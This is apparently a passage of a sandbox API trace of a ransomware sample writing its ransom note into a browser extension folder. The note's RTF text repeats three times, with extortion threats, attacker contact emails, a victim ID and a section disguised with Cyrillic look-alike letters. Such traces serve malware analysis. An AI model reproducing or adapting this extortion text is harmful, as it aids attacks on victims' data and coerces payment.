data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn 